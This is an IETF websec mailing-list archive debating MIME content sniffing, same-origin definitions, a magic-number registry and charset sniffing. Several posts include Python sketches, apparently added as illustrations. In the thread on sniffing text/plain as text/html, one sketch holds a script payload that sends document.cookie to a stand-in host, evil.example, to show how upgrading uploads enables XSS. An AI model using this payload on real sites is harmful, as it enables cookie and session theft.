Re: [websec] Meeting minutes uploaded

2012-11-14 Thread Larry Masinter
Re Mime sniffing, the minutes reported:

> Nobody in the group objected
> to having this move to WHAT-WG, and according to Larry Manister, the
> W3C is also fine with referencing the WHATWG document, so the work
> item will be removed from our charter.

I did not say this. What I said in the meeting was that I had no objection to 
the working group dropping the work in the IETF.

To elaborate:
* I think dropping the work is the logical action if none of the implementors 
are willing to do the work in the IETF.

* I do not speak for W3C and what the W3C is "fine with".
* However, I believe W3C management is concerned about ensuring stable  
normative references in W3C specs, but they will deal with those.

Larry

___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


[websec] scope of mimesniff: roles vs. contexts vs. delivery channels

2012-01-11 Thread Larry Masinter
Going back to the "scope" question, should the mimesniff document cover 
sniffing in contexts other than browsers, e.g., by web servers during file 
upload, by proxies or firewalls or gateways, by spiders or search engines, etc.?

Within the browser context, does it cover sniffing in special applications like 
font, video, style sheet, script contexts, where more is known about the type 
that is wanted?

The dimension of 'roles' is somewhat orthogonal to the dimension we were 
talking about previously (whether the specification should cover sniffing of 
content delivered by means other than HTTP).

The sentiment previously seemed to be to cover a broad scope of delivery 
channels: sniffing should cover content delivered by FTP or through (mounted) 
file system access, etc., and the intent was also to cover a broad scope of 
contexts (including font, video, style sheet, etc.).

But what about the other roles? I think we could address them at least to some 
degree, if only to lay out what the constraints are, or what, say, a firewall 
should do (a firewall scanning content should likely examine the data as it 
might appear in any of the formats a recipient might interpret it as, for 
example).

Larry
--
http://larry.masinter.net








[websec] When is sniffing heuristic?

2012-01-08 Thread Larry Masinter
There are several different situations where sniffing is of necessity 
heuristic, because you are 'guessing' the intent of the content.
These are due to the fact that the set of possible valid Content-Type values 
does not partition the space of possible bodies.

There may be other situations where sniffing is heuristic, but in these cases, 
sniffing is *necessarily* heuristic because there are multiple results which 
are valid, and knowing the right result requires additional information about 
the intent of the communication. The heuristic comes presumably from a manual 
examination of some web material where such information about intent is known, 
and projecting that the generalization applies to all such material and cases.

a) Specializations:

A file which is, for example, application/xhtml+xml is, of necessity, also a 
valid file of type application/xml. If you were to "sniff" some content that 
was valid application/xhtml+xml, you could also legitimately claim it was 
application/xml.
Most data types which are 'text' are also text/plain.
Every type is a subset of application/octet-stream.

There are innumerable examples of this, and a large number of failure cases, 
e.g., zip-based packaging formats being sniffed as zip when the specialization 
isn't correctly recognized, or image/dng being sniffed as image/tiff, etc.
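To make the ambiguity concrete, here is a small illustrative sketch (the helper name and checks are mine, not anything from the draft): for content that happens to be valid XHTML, several media-type claims hold at once.

```python
def candidate_types(body: bytes) -> list:
    """Return every media type a consumer could legitimately claim for `body`.
    Illustrative only: real sniffers use byte signatures, not parsing."""
    candidates = ["application/octet-stream"]   # every body qualifies
    try:
        text = body.decode("utf-8")
        candidates.append("text/plain")         # decodable text
        if text.lstrip().startswith("<"):       # XML-looking content
            candidates.append("application/xml")
            if "http://www.w3.org/1999/xhtml" in text:
                candidates.append("application/xhtml+xml")  # the specialization
    except UnicodeDecodeError:
        pass                                    # binary: only octet-stream
    return candidates

doc = b'<?xml version="1.0"?><html xmlns="http://www.w3.org/1999/xhtml"/>'
print(candidate_types(doc))
# -> ['application/octet-stream', 'text/plain', 'application/xml',
#     'application/xhtml+xml']
```

Each claim in the returned list is "correct"; sniffing must nonetheless pick one.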


b) "Polyglot":

This is a situation where data is intentionally prepared to be interpretable as 
two different media types, possibly to be served and later processed as either, 
where the intention of the content is to behave similarly for ordinary 
processing, but amenable to specialized processing only defined for one or the 
other media type. The XHTML/HTML polyglot spec

http://dev.w3.org/html5/html-xhtml-author-guide/

is of course the most relevant use case. The same content could be sniffed 
to be either type.  This is different from the specialization case because 
neither of the media types is a subset of the other.

c) "Multiview"

I don't know exactly what to call this, but it is the situation where the same 
content is intentionally valid as two different media types; neither type is a 
specialization of the other, and the treatment under the two types is 
intentionally different.  The use case for multiview I was looking at was one 
where the same content could be viewed as XHTML (for a presentational view) 
and also as RDF (for a data point of view).

This is different from specialization (since the two types overlap but neither 
is a subset of the other), and from polyglot (since the material is intended to 
have different meanings in its ordinary applications).




[websec] more on sniffing

2012-01-08 Thread Larry Masinter


  HTTP provides a way of labeling content with its
  Content-Type, as an indication of the file format / language by
  which the content is to be interpreted.  Unfortunately, many web
  servers, as deployed, supply incorrect Content-Type header
  fields with their HTTP responses.  In order to be compatible
  with these servers, web clients would consider the content of
  HTTP responses as well as the Content-Type header fields when
  determining how the content was interpreted (the "effective
  media type").  Looking at content to determine its type (aka
  "sniffing") is also used when no Content-Type header is
  supplied.


It seemed important to define "sniffing".
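As a sketch of what that definition amounts to (hypothetical helper names; the draft's actual algorithm is far more detailed, and this handles only the no-header case and two illustrative signatures):

```python
def sniff(body: bytes) -> str:
    """Look at the content to determine its type. The two signatures here
    are well-known magic numbers; the selection is illustrative only."""
    if body.startswith(b"\x89PNG\r\n\x1a\n"):
        return "image/png"
    if body.startswith(b"%PDF-"):
        return "application/pdf"
    return "application/octet-stream"        # fallback for unknown content

def effective_media_type(content_type, body: bytes) -> str:
    """Compute the 'effective media type' quoted above: sniff when no
    Content-Type header was supplied, otherwise honor the header."""
    if content_type is None:                 # no header at all: sniff
        return sniff(body)
    return content_type                      # header supplied: honor it

print(effective_media_type(None, b"%PDF-1.4 ..."))          # -> application/pdf
print(effective_media_type("text/plain", b"%PDF-1.4 ..."))  # -> text/plain
```

The harder question the draft addresses, not modeled here, is when to override a header that is present but wrong.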


  
  Q: Why doesn't file upload sniff?
  Q: Where is the concept of 'privilege' defined?
  Q: Why not treat sniffed content as a different origin to prevent XSS?
  

I'm not sure, but shouldn't at least some of the bigger unaddressed issues be 
in the document? Probably the "status of this document" section should just 
point to the tracker, and I should enter these as issues; I'm not sure how the 
group wants to track them.


  However, overly ambitious sniffing has resulted in a number
  of security issues in the past. For example, consider a simple
  server which allows users to upload content, which is then
  served as simple content such as plain text or an image.
  If the content is subsequently 'sniffed' to be active
  content, a malicious user might be able to leverage
  content sniffing to mount a cross-site scripting attack by
  including JavaScript code in the uploaded file that a user agent
  treats as text/html.

As I noted before, I wish there were more examples of sniffing security issues 
since that's the main justification for this document, at least as a 'websec' 
document.

  This document describes a method for sniffing that carefully
  balances the compatibility needs of user agent implementors with the
  security constraints.

I only changed "algorithm" to "method" because of the many unspecified options 
(e.g., how long to wait for additional data).


  Often, sniffing is done in a context where the use
   of the data retrieved is not merely for independent presentation,
but for embedding (as an image, as video) or other uses
(as a style sheet, a script). 

I think this is the crux of some additional material, where you know that 
you're sniffing  a font or a script or a style sheet, and that knowledge 
influences the sniffing decision.

  One can consider 'sniffing' in several categories:

  * Content delivered via a channel which does not allow
    supplying Content-Type
  * Content delivered via HTTP, but no Content-Type supplied
  * Content-Type is malformed
  * Content-Type is duplicated with different values
  * Content-Type is syntactically legal, but content clearly does not
    match the constraints of the specified content-type
  * Content-Type is syntactically legal, and content may actually match
    the constraints of the specified content-type, but the content
    is intended for use in a limited context, in which the
    content could also be interpreted as another type
  * Content matches the specified content-type constraints, and that
    type is appropriate for the context of use, but there is some
    other belief that the content has been mislabeled

  The supplied content-type usually comes from HTTP, but in
  some situations, the link to the content contains a
  content-type.  (For example, in a style sheet or script.)

This is trying to address the question of when sniffing might result in "false 
positives".  The main issue is that sniffing needs to come up with a 
definitive answer ("what is this") even in situations where the signature of 
the data is consistent with multiple results (the data could be interpreted as 
application/octet-stream, text/plain, application/xml, 
application/something1+xml, or application/something2+xml, and all of those 
match the signature data; the same issue happens with zip-based packaging 
formats).

  ftp: and file: resources also examine the file extension.

The widget packaging recommendation, which normatively references some version 
of sniffing, also uses file extensions for some content and not others, but I 
haven't figured out yet where that belongs.


   The methods described here have been constructed with
  reference to content sniffing algorithms present in popular user
  agents, an extensive database of existing web content, and
  metrics collected from implementations deployed to a sizable
  number of users.

  For reasons discussed in http://www.w3.org/2001/tag/doc/mime-respect,
 sniffing should be avoided when the content could likel

Re: [websec] mimesniff feedback, part 2

2012-01-08 Thread Larry Masinter
I've started on editing the sniffing document in earnest. 

Foolishly, I started going through it from the beginning.  Here's a take at the 
Abstract to make the scope clearer:

  HTTP provides a way of labeling content with its
  Content-Type, an indication of the file format / language by
  which the content is to be interpreted.  Unfortunately, many web
  servers, as deployed, supply incorrect Content-Type header
  fields with their HTTP responses.  In order to be compatible
  with these servers, web clients would consider the content of
  HTTP responses as well as the Content-Type header fields when
  determining how the content was interpreted (the "effective
  media type").  Looking at content to determine its type (aka
  "sniffing") is also used when no Content-Type header is
  supplied.  Overly ambitious sniffing has resulted in a number of
  security issues in the past.  This document specifies methods
  and options for computing an effective media type, in a way that
  addresses both security and compatibility considerations.
  It also discusses the use of sniffing in contexts other than
  delivery of content via HTTP.
  

I wanted to address the scope by making it clear that the scope of the document 
included sniffing outside of content delivered via HTTP.

*** Shouldn't sniffed content have a different origin than the content as 
labeled?  The only "privilege upgrades" that I've come across seem to be 
cross-origin ones. 

*** Is sniffing used by servers when clients use file upload? Do web servers 
do sniffing on content to decide what media type to label the content with? Or 
is sniffing really only scoped to apply to web browsers?



  HTTP provides a way of labeling content with its
  Content-Type, as an indication of the file format / language by
  which the content is to be interpreted.  Unfortunately, many web
  servers, as deployed, supply incorrect Content-Type header
  fields with their HTTP responses.  In order to be compatible
  with these servers, web clients would consider the content of
  HTTP responses as well as the Content-Type header fields when
  determining how the content was interpreted (the "effective
  media type").  Looking at content to determine its type (aka
  "sniffing") is also used when no Content-Type header is
  supplied.

I tried to introduce "effective media type", as it was used before being defined.

Where is the term "privilege escalation", as used in this document, defined?

http://en.wikipedia.org/wiki/Privilege_escalation

defines the term in general, and then at the end mentions a couple of examples 
under

===begin Wikipedia quote ===
"Examples of horizontal privilege escalation"

This problem often occurs in web applications. Consider the following example:
User A has access to his/her bank account in an Internet Banking application.
User B has access to his/her bank account in the same Internet Banking 
application.
The vulnerability occurs when User A is able to access User B's bank account by 
performing some sort of malicious activity.
This malicious activity may be possible due to common web application 
weaknesses or vulnerabilities.
Potential web application vulnerabilities or situations that may lead to this 
condition include:
* Predictable session ID's in the user's HTTP cookie
* Session fixation
* Cross-site Scripting
* Easily guessable passwords
* Theft or hijacking of session cookies
* Keystroke logging
===end Wikipedia quote ==

But there are no mentions there of sniffing as a source of privilege escalation.

Surely, since this is the main use case the specification is intended to 
mitigate, shouldn't it be described somewhere? 

The examples given in passing in the document seem to be XSS attacks (which 
would be mitigated merely by giving sniffed content a different unique origin, 
wouldn't they?) 

The abstract implies there might be other attacks too... Are there? What are 
they?

Larry
--
http://larry.masinter.net




Re: [websec] Define cross-origin

2011-11-27 Thread Larry Masinter
Re http://tools.ietf.org/html/draft-ietf-websec-origin#section-5

So when you say that a URI "has" an origin, that isn't quite true, right? Some 
URIs have infinitely many origins, and you get a new one whenever you ask for 
one. To know when you have to ask for a new one and not reuse the one you got 
before, you have to ... what? Is there some mysterious other attribute 
or state that goes along with the URI that you use to decide whether the second 
instance of the "same" URI is different enough to want to get a new origin?


-Original Message-
From: Adam Barth [mailto:i...@adambarth.com] 
Sent: Sunday, November 27, 2011 11:17 AM
To: Larry Masinter
Cc: Tobias Gondrom; websec@ietf.org
Subject: Re: [websec] Define cross-origin

On Sun, Nov 27, 2011 at 9:42 AM, Larry Masinter  wrote:
> In my experience, it's possible to make editorial changes without significant 
> hiccup as long as it is clear there is no objection -- and adding a 
> non-controversial term definition would seem to be editorial.
>
> However, I'm really baffled by "Two URIs are the same-origin if their origins 
> are the same."
>
>      NOTE: A URI is not necessarily same-origin with itself.  For
>      example, a data URI [RFC2397] is not same-origin with itself
>      because data URIs do not use a server-based naming authority and
>      therefore have globally unique identifiers as origins.
>
> If "origin" is an attribute of a "URI", then a.origin = a.origin.

Origin is not an attribute of a URI.  It's a value you can compute from a URI.

> If a URI "has" an origin, how can that origin be subject to change, 
> mathematically.
> I suppose this is a result of using a normative algorithm in 4 instead of a 
> set of invariants.

It's a result of how the web works.  However we define origin, it needs to be 
the case that a URI is not necessarily same-origin with itself.

> Perhaps section 5 should instead say:
>
> Two URIs are "same origin" if computing their origins results in the same 
> value, and "cross-origin" if the results are different.
> Note that in this formulation, a URI is not necessarily same-origin with 
> itself; for example, a data URI [RFC2397] is not same-origin with itself 
> because data URIs do not use a server-based naming authority, and different 
> invocations of the "origin" computation will result in different (globally 
> unique) origins.

That's fine, but I would remove the phrase about "formulation".  It doesn't have 
anything to do with this particular formulation of this concept.  It's a 
consequence of the concept itself.
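A sketch of that behavior (invented helper, not the draft's algorithm): origin is computed per invocation, and a data: URI yields a fresh globally unique origin each time, so it is not same-origin with itself.

```python
import itertools

_unique = itertools.count()

def origin_of(uri: str):
    """Compute an origin from a URI. Origin is not a stored attribute but
    a value computed per invocation; non-hierarchical schemes like data:
    get a fresh globally unique origin on every call. Sketch only; the
    origin draft's algorithm differs in detail (ports, IDNA, etc.)."""
    scheme, _, rest = uri.partition(":")
    if scheme in ("http", "https"):
        host = rest.lstrip("/").split("/")[0]
        return (scheme, host)              # (scheme, host) tuple
    return ("unique", next(_unique))       # globally unique origin

a = "data:text/html,hello"
print(origin_of(a) == origin_of(a))   # False: not same-origin with itself
b = "http://example.com/x"
print(origin_of(b) == origin_of(b))   # True
```

Two computations over the same data: URI compare unequal, which is exactly the "not necessarily same-origin with itself" behavior under discussion.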

Adam


Re: [websec] Define cross-origin

2011-11-27 Thread Larry Masinter
In my experience, it's possible to make editorial changes without significant 
hiccup as long as it is clear there is no objection -- and adding a 
non-controversial term definition would seem to be editorial.



However, I'm really baffled by "Two URIs are the same-origin if their origins 
are the same."

  NOTE: A URI is not necessarily same-origin with itself.  For
  example, a data URI [RFC2397] is not same-origin with itself
  because data URIs do not use a server-based naming authority and
  therefore have globally unique identifiers as origins.


If "origin" is an attribute of a "URI", then a.origin = a.origin.  If a URI 
"has" an origin, how can that origin be subject to change, mathematically?
I suppose this is a result of using a normative algorithm in 4 instead of a set 
of invariants. 

Perhaps section 5 should instead say:

Two URIs are "same origin" if computing their origins results in the same value, 
and "cross-origin" if the results are different.
Note that in this formulation, a URI is not necessarily same-origin with 
itself; for example, a data URI [RFC2397] is not same-origin with itself 
because data URIs do not use a server-based naming authority, and different 
invocations of the "origin" computation will result in different (globally 
unique) origins.

=

Larry



Re: [websec] mimesniff feedback, part 2

2011-11-27 Thread Larry Masinter
> Depending on how the working group resolves some of the issues it is 
> considering, the draft will need to be substantially re-written.  For 
> example, if we 
> decide to use an IANA registry (as seems likely) all of the text that Philip 
> commented on will be removed from the document.

I think the body of the text might say "Use the values in the IANA registry", 
but that the "IANA considerations" section would contain all of the 
instructions for how to set up the registry.

That is, the document would stay the authoritative source for the _initial_  
contents of the registry, but updates and additions could be managed through 
whatever registration process we decided on, without having to update the 
document or algorithm itself.

Larry



[websec] Sniffing test suite?

2011-10-28 Thread Larry Masinter
http://greenbytes.de/tech/tc/httpcontenttype/

might be a model for building up a sniffing test suite for HTTP  (the sniffing 
test suite for ftp and file -- and others -- would have to be coordinated.)




Re: [websec] Issue 17: Registry for magic numbers

2011-10-26 Thread Larry Masinter
A standards specification should meet the requirements of the use cases that 
are in scope for the specification. 

If you only evaluate adequacy against a narrow set of requirements, then the 
scope should be limited to those situations where those requirements suffice.

If you're evaluating against what "a user agent needs to perform in order to 
be competitive in the browser market", then the only use cases you're 
validating against are "popular web browsers in 2012", which is a very narrow 
scope.

If, on the other hand, you expect the standard to have value over the long 
term, you need a longer-term and broader set of requirements and use cases, 
which will add additional complexity to meet requirements.

Larry


-Original Message-
From: Adam Barth [mailto:i...@adambarth.com] 
Sent: Tuesday, October 25, 2011 11:45 PM
To: Larry Masinter
Cc: Tobias Gondrom; websec@ietf.org
Subject: Re: [websec] Issue 17: Registry for magic numbers

You've posed a large number of questions.  I'll do my best to answer them.

On Tue, Oct 25, 2011 at 11:31 PM, Larry Masinter  wrote:
> This gets back to the question of the scope of the document. Does it, 
> or does it not, handle sniffing of arbitrary blobs of data that come 
> in without any content-type,

User agents that implement sniffing are expected to sniff HTTP responses that 
lack a Content-Type header, yes.

> blobs of data labeled application/octet-stream,

User agents that implement sniffing are not expected to sniff HTTP responses 
that contain Content-Type header with the value application/octet-stream.

> and data coming via ftp (through ftp URIs)

Yes.

> or thumb drives

Yes.

>or mounted NFS file systems or whatever?

Yes.

You can answer these questions by reading the document.  For example, the 
document explicitly states the set of Content-Type header values that trigger 
sniffing.  The document also explicitly calls out FTP as an example.
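The trigger set Adam describes could be sketched as follows; the concrete checks are an assumption for illustration, and the draft itself enumerates the authoritative list:

```python
def should_sniff(content_type):
    """Decide whether to sniff an HTTP response, per the exchange above:
    a missing Content-Type header triggers sniffing, while an explicit
    application/octet-stream does not. Illustrative only; the draft
    states the authoritative set of trigger values."""
    if content_type is None:          # no Content-Type header at all
        return True
    if content_type.strip() == "":    # header present but empty
        return True
    return False                      # explicit value, incl. octet-stream

print(should_sniff(None))                          # True
print(should_sniff("application/octet-stream"))    # False
```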

> Does it, or does it not, handle sniffing rules inside ZIP packaged web 
> applications?

Not as described by this document.  However, I've been told that another 
document has re-used the algorithm for that purpose.

> If it does, then sniffing should cover everything that is sniffable, 
> including almost all MIME types

Why is that?  The document describes what is essentially the minimal amount of 
sniffing a user agent needs to perform in order to be competitive in the 
browser market.  I don't think we should be encouraging sniffing beyond that.

> -- you say "most MIME types that get registered don't need sniffing 
> rules", I don't know what the percentage is,

With the possible exception of fonts, I believe the document describes all the 
sniffing rules that are necessary today.  You can compare the list of MIME 
types in the document with the list of registered MIME types if you wish to get 
a sense of what I mean when I say that "most"
don't need sniffing rules.

> but after all, don't you want to be able to discover file types??

I'm not sure what you mean by "discover file types".  There's no discovery 
going on here.

> Of course, maybe that broad applicability of sniffing isn't appropriate, but 
> then ... where are the boundaries?

The boundaries are exactly what's described in the document.  There's been a 
great deal of research and implementation experience poured into the document 
to determine precisely where to draw the boundaries.
 As far as I can tell, the document describes the optimal point.  If you have 
data that shows otherwise, I'd like to see it.

> Which situations are in scope vs. not?

The criterion I would use is the following:

"Given a diverse market of browser vendors, is this a sniffing algorithm that 
all browser vendors are mutually interested in converging upon?"

If the answer is "yes", then you've identified the correct scope and rules.  If 
"no", then the spec needs to be improved.  If there is no such set of rules, 
then this endeavor is a waste of time and any spec we create will be dead 
letter.

> And don't some of the "in-scope" situations need almost all MIME types to be 
> sniffable?

No.

Adam


> -Original Message-
> From: websec-boun...@ietf.org [mailto:websec-boun...@ietf.org] On 
> Behalf Of Adam Barth
> Sent: Tuesday, October 25, 2011 9:00 PM
> To: Tobias Gondrom
> Cc: websec@ietf.org
> Subject: Re: [websec] Issue 17: Registry for magic numbers
>
> Yeah, I think we're much better off creating a new registry rather than using 
> the MIME registry.  The truth is that most MIME types that get registered 
> don't need sniffing rules.  The only ones that need it are the legacy ones 
> and the ones browser vendors cause to need it because of the 

Re: [websec] Issue 17: Registry for magic numbers

2011-10-25 Thread Larry Masinter
This gets back to the question of the scope of the document. Does it, or does 
it not, handle sniffing of arbitrary blobs of data that come in without any 
content-type, blobs of data labeled application/octet-stream, and data coming 
via ftp (through ftp URIs) or thumb drives or mounted NFS file systems or 
whatever? Does it, or does it not, handle sniffing rules inside ZIP packaged 
web applications?   

If it does, then sniffing should cover everything that is sniffable, including 
almost all MIME types  -- you say "most MIME types that get registered don't 
need sniffing rules", I don't know what the percentage is, but after all, don't 
you want to be able to discover file types??  


Of course, maybe that broad applicability of sniffing isn't appropriate, but 
then ... where are the boundaries? Which situations are in scope vs. not? And 
don't some of the "in-scope" situations need almost all MIME types to be 
sniffable?
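For concreteness, here is roughly what a registry of sniffable types might record; the signatures listed are well-known magic numbers, but the selection and the helper are mine, not the draft's table:

```python
# A few widely known file signatures ("magic numbers"), illustrating what
# a sniffing-registry entry might record.
SIGNATURES = [
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"GIF87a",            "image/gif"),
    (b"GIF89a",            "image/gif"),
    (b"\xff\xd8\xff",      "image/jpeg"),
    (b"%PDF-",             "application/pdf"),
    (b"PK\x03\x04",        "application/zip"),  # also every zip-based format
    (b"\x1f\x8b",          "application/gzip"),
]

def sniff_signature(body: bytes):
    """Return the first matching registered type, or None if the content
    has no registered signature (the 'discovery' Larry asks about)."""
    for magic, mtype in SIGNATURES:
        if body.startswith(magic):
            return mtype
    return None

print(sniff_signature(b"GIF89a..."))   # -> image/gif
```

Note how the zip signature illustrates the specialization problem: every zip-based packaging format matches `PK\x03\x04` first.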

Larry


-Original Message-
From: websec-boun...@ietf.org [mailto:websec-boun...@ietf.org] On Behalf Of 
Adam Barth
Sent: Tuesday, October 25, 2011 9:00 PM
To: Tobias Gondrom
Cc: websec@ietf.org
Subject: Re: [websec] Issue 17: Registry for magic numbers

Yeah, I think we're much better off creating a new registry rather than using 
the MIME registry.  The truth is that most MIME types that get registered don't 
need sniffing rules.  The only ones that need it are the legacy ones and the 
ones browser vendors cause to need it because of the prisoner's dilemma in the 
browser market.

Adam


On Tue, Oct 25, 2011 at 8:52 PM, Tobias Gondrom  
wrote:
> 
> For me the point is, currently we have a table in the document, which 
> inside an RFC is rather static and hard to extend.
> So it looks like a good case for a registry to allow for extensibility 
> for new mime-types. (e.g. we keep the table in the document, create an 
> IANA registry, copy the values to the registry and allow for future 
> entries by expert review) That can either be added to the current 
> Mime-type registry, or we create a new one (e.g. within the websec 
> namespace) with only these elements.
>
> Just my 5cents.
>
> Tobias
>
>
>
> On 25/10/11 05:23, Adam Barth wrote:
>>
>> On Mon, Oct 24, 2011 at 9:07 PM, "Martin J. Dürst"
>>   wrote:
>>>
>>> On 2011/10/25 11:21, Adam Barth wrote:

 http://trac.tools.ietf.org/wg/websec/trac/ticket/17 refers to an 
 IANA registry with magic numbers for various media types.  I wanted 
 to compare them to what's in the draft, but I couldn't find it.  I 
 found the media type registry, e.g., for images:

 http://www.iana.org/assignments/media-types/image/index.html

 but I don't see any magic numbers.  Would someone be willing to 
 point me in the right direction?
>>>
>>> They are in the templates. To get the template for a registration, 
>>> start at the overview page 
>>> (http://www.iana.org/assignments/media-types/index.html).
>>>
>>> Then go to the page that lists all the registration for a give top 
>>> level, e.g. 
>>> http://www.iana.org/assignments/media-types/image/index.html for images.
>>>
>>> Then look at each registration template (click on the link in the 
>>> left column, or in the right column if the left one doesn't have a 
>>> link and the right one is to an RFC). You may then find a magic 
>>> number in the registration template. As an example, for image/jp2, 
>>> the template is at 
>>> http://www.iana.org/assignments/media-types/image/jp2.
>>>
>>> But it looks like earlier templates didn't have a field for a magic 
>>> number, and this and the reasons Anne gave make this information 
>>> helpful for cross-checking, but not much more.
>>
>> == Images ==
>>
>> PNG has a registration template, but lacks a signature.
>> JPEG doesn't have a template.
>> GIF doesn't have a template.
>> BMP isn't even registered.
>> WEBP isn't even registered.
>> ICO has a registration template and has the correct signature.  Yay!
>>
>> == Text ==
>>
>> HTML lacks a registration template.
>>
>> == Application ==
>>
>> PDF doesn't have a template.
>> Postscript doesn't have a template.
>> OGG doesn't have a template.
>> RAR isn't even registered.
>> ZIP has a registration template, but lacks a signature.
>> GZIP isn't even registered.
>> RSS isn't even registered.
>> Atom lacks a registration template.
>>
>> == Audio ==
>>
>> WAV isn't even registered.
>>
>> == Video ==
>>
>> MP4 lacks a registration template.
>> WebM isn't even registered.
>>
>> This does not look like a promising approach.  Note: I haven't even 
>> looked through all the registrations to see how many have signatures 
>> that we shouldn't be using.
>>
>> Adam

Re: [websec] font sniffing

2011-10-24 Thread Larry Masinter
It's been emphasized that there is no reason why third parties can't register 
media types if they want to. So there should be no barrier to specifying a 
content-type for fonts, if that's what is wanted.

Why is it a "lost cause" when no one even tried?

Larry


-Original Message-
From: websec-boun...@ietf.org [mailto:websec-boun...@ietf.org] On Behalf Of 
Anne van Kesteren
Sent: Monday, October 24, 2011 4:44 AM
To: Tobias Gondrom
Cc: websec@ietf.org
Subject: Re: [websec] font sniffing

On Mon, 24 Oct 2011 20:36:50 +0900, Tobias Gondrom  
wrote:
> So a specific use case for this could be helpful - and a volunteer to 
> provide input on by which criteria exactly fonts should be sniffed and 
> help with writing up the font mime-type for the registry (I can help 
> with the latter).

The use case is @font-face, CSS' font linking feature. The criteria I have 
emailed to this list before:

http://www.ietf.org/mail-archive/web/websec/current/msg00235.html


--
Anne van Kesteren
http://annevankesteren.nl/


Re: [websec] #21: sniffing of text/html shouldn't override polyglot label of application/xhtml+xml

2011-10-24 Thread Larry Masinter
I don't understand, Philip. A central case of this document involves taking 
documents that look like text/html but are labeled as text/plain and "sniffing" 
them to be text/html after all.

It's claimed that this is necessary, part of most browsers today, regular 
practice, etc.

Are you opposed to specifying sniffing from text/plain to text/html? In any 
case? 
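To illustrate what is at stake, a check of roughly this shape (the tag list is illustrative, not the draft's exact one) is what turns a "plain text" upload into active content:

```python
# Why "upgrading" text/plain is contentious: content served as text/plain
# that passes a check like this would be executed as text/html instead of
# displayed literally. The tag list is an assumption for illustration.
HTML_HINTS = (b"<!doctype html", b"<html", b"<script", b"<body", b"<head")

def looks_like_html(body: bytes) -> bool:
    head = body[:512].lstrip().lower()   # inspect only a leading window
    return head.startswith(HTML_HINTS)

upload = b"<script>document.location='http://evil.example/?'+document.cookie</script>"
print(looks_like_html(upload))   # True: the uploaded "plain text" would run
```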

Larry


-Original Message-
From: websec-boun...@ietf.org [mailto:websec-boun...@ietf.org] On Behalf Of 
Philip Gladstone
Sent: Monday, October 24, 2011 9:24 AM
To: websec@ietf.org
Subject: Re: [websec] #21: sniffing of text/html shouldn't override polyglot 
label of application/xhtml+xml



On 10/23/2011 7:52 PM, websec issue tracker wrote:
>
>   (One still might want to sniff text/html when the type is labeled
>   text/plain, for example, but not for other polyglot cases.)
This would be a disaster. For security reasons, a web server needs to know when 
a document will be "executed" rather than "displayed". 
Currently, using text/plain will display any document literally. Causing a 
document that looks like html to be executed will open lots of web sites to XSS.

Philip


Re: [websec] #22: content-type sniffing should include charset sniffing

2011-10-23 Thread Larry Masinter
The charset sniffing documentation in the HTML5 document isn't all that 
complicated, anyway. 

And it has to be somewhere. 

What's the point of standardizing sniffing of the internet media type without 
also standardizing the sniffing of all of the relevant parameters? The goal is 
to sniff the content-type; the media type by itself isn't what's used.
It's just that for text and xml types, the 'charset' parameter is already there.
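Larry's point is that the charset rides along as a parameter of the very header field being sniffed. Python's stdlib (not part of any draft, just an illustration) shows the split between the bare media type and the parameter:

```python
# The charset is a parameter of the Content-Type value, so a sniffer that
# rewrites the media type is already handling the same header field.
from email.message import EmailMessage

msg = EmailMessage()
msg["Content-Type"] = "text/html; charset=ISO-8859-1"
print(msg.get_content_type())     # 'text/html'   (the bare media type)
print(msg.get_content_charset())  # 'iso-8859-1'  (the parameter at issue)
```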

Also, the algorithm in the document currently is incomplete and inappropriate 
if you're going to sniff XML-based media types, so the fact that the current 
algorithm can get away with hiding "charset guessing" as if it were just on 
octets and not the characters -- well, that's just a superficial work-around.

Larry


-Original Message-
From: "Martin J. Dürst" [mailto:due...@it.aoyama.ac.jp] 
Sent: Sunday, October 23, 2011 11:37 PM
To: Larry Masinter
Cc: Adam Barth; websec@ietf.org
Subject: Re: [websec] #22: content-type sniffing should include charset sniffing

I agree with Adam and Tobias that we should not pull all of charset sniffing 
into this document. Many charset details depend on the mime type in the first 
place, and are carefully described in the respective specs. For some transfer 
protocols, the question of charset may be irrelevant (e.g. for text over 
Websocket, which prescribes and checks for UTF-8).

Larry is right that in some cases, some preliminary charset sniffing is 
necessary to get at some information at the start of the document, but I think 
we should strictly limit this draft to these cases.

Regards, Martin.

On 2011/10/24 13:14, Larry Masinter wrote:
> I was talking about the necessary dependency of the specifications -- that 
> you couldn't specify media type sniffing completely without making at least a 
> normative reference to charset sniffing.
>
> The fact that the code works that way is evidence, of course, but 
> we're not talking about possibility of implementation (where a single 
> implementation is evidence) but rather orthogonality of interfaces 
> (where the question is whether ALL implementations must follow this 
> pattern.)
>
> Larry
>
>
>
>
> -----Original Message-
> From: Adam Barth [mailto:i...@adambarth.com]
> Sent: Sunday, October 23, 2011 8:37 PM
> To: Larry Masinter
> Cc: Tobias Gondrom; websec@ietf.org
> Subject: Re: [websec] #22: content-type sniffing should include 
> charset sniffing
>
> I mean, that's how the code works, so it must be possible.  :)
>
> Adam
>
>
> On Sun, Oct 23, 2011 at 8:32 PM, Larry Masinter  wrote:
>> I know it's complicated, but scanning text is necessarily part of 
>> determining which application/something+xml  you have.  I think (but should 
>> really check before saying this) that XML media type registrations describe 
>> what the DOCTYPE or XML namespace or root element are, and that, to properly 
>> "sniff" them, you'd have to scan text. But before you scan text, you have to 
>> determine charset.
>>
>> So if we're going to support sniffing of media types in general, I don't see 
>> how we can do that without also specifying charset determination.
>>
>>
>>
>> Larry
>>
>> -Original Message-
>> From: websec-boun...@ietf.org [mailto:websec-boun...@ietf.org] On 
>> Behalf Of Adam Barth
>> Sent: Sunday, October 23, 2011 8:28 PM
>> To: Tobias Gondrom
>> Cc: websec@ietf.org
>> Subject: Re: [websec] #22: content-type sniffing should include 
>> charset sniffing
>>
>> The charset sniffing is also complicated by the fact that sometimes user 
>> agents need to parse some of the HTML to find a <meta> element.
>> In some situations, user agents need to restart the parsing algorithm, which 
>> is quite delicate and better to describe in the same document as HTML 
>> parsing (at least for use by HTML processing engines).
>>
>> Adam
>>
>>
>> On Sun, Oct 23, 2011 at 8:24 PM, Tobias Gondrom  
>> wrote:
>>> 
>>> I tend not to agree with that.
>>>
>>> The fact that charset sniffing might happen at the same time as 
>>> mime-sniffing does not seem like a strong argument to include this 
>>> in the draft.
>>>
>>> Furthermore I would rather have these issues separate:
>>> First you determine the content-type and then after that you may 
>>> want to determine the charset used within that content-type (if you 
>>> really have to sniff the charset). I can also imagine that charset 
>>> sniffing algorithm might be depending on the application identified 
>> by the sniffed mime-type, which again would speak against throwing it in 
